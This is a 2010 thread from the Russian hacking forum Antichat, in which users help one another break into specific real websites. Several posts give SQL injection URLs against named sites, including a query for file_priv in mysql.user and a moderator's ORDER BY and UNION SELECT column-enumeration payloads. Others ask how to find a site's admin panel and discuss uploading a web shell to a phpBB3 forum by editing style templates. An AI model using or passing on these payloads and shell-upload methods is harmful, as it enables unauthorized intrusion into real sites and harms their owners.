Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.05.2010, 13:12
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
Сообщение от LokbatanLi
если мойно помоqите наыти админку
http://biophys.am:2082/
|
|
|
30.05.2010, 13:13
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
eto cPanel
|
|
|
|
30.05.2010, 13:59
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от CyberHunter
Скажите как проверить file_priv?
Вот например инъекция:
Код:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
Код:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл? Для кого человек это писал? https://forum.antichat.ru/thread104591.html
Сообщение от CyberHunter
Вот именно, что я это прочитал, делаю все как и написано, но ничего не получается.
Что не так делаю?
плохо читал видать 
если ошибки
Код:
MySQL server version for the right syntax to use near '\'db156426_4\' --'
Код:
Access denied for user 'db156426_4'@'127.0.0.2' to database 'mysql'
тебе ни о чем не говорят,то я не знаю...
Последний раз редактировалось .:[melkiy]:.; 30.05.2010 в 14:24..
|
|
|
|
30.05.2010, 14:14
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Для кого человек это писал? https://forum.antichat.ru/thread104591.html
Вот именно, что я это прочитал, делаю все как и написано, но ничего не получается.
Что не так делаю?
|
|
|
|
30.05.2010, 14:42
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131
Репутация:
45
|
|
Сообщение от Ctacok
вбей 'abcd, если abcd в ошибке будет, то крути.
Насчёт drupal, смотри /sites/название сайта, а вообще может быть любое/settings.php
В default редко бывают доступы.
вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'abcd%' AND active = 'Y' ORDER BY 'ProductTitle' ASC LIMIT 0, 16' at line 1
зы другой сайт
|
|
|
|
30.05.2010, 14:45
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Есть форум phpbb3, залить шел через стиль невозможно, какие еще есть способы??
|
|
|
|
30.05.2010, 16:04
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
GOGA075 почему невозможно? у меня было такое что невозможно было редактировать стиль установленный, но если редактировал шаблон другого стиля и потом устанавливал его как основной , то все канало...
|
|
|
|
30.05.2010, 16:09
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Gorev
В этом форуме нету ни редактора стилей ни функции "разрешать php..."
Админ видно удалил данные модули!!
|
|
|
|
30.05.2010, 16:11
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от GOGA075
Gorev
В этом форуме нету ни редактора стилей ни функции "разрешать php..."
Админ видно удалил данные модули!!
ну тогда видимо не получится через форумак залить
|
|
|
|
30.05.2010, 16:15
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от DrakonSerg
вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'abcd%' AND active = 'Y' ORDER BY 'ProductTitle' ASC LIMIT 0, 16' at line 1
зы другой сайт
abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 --
Если выведет 14, значит полей 13, и .т.п
abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --
ponel?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Линейный вид
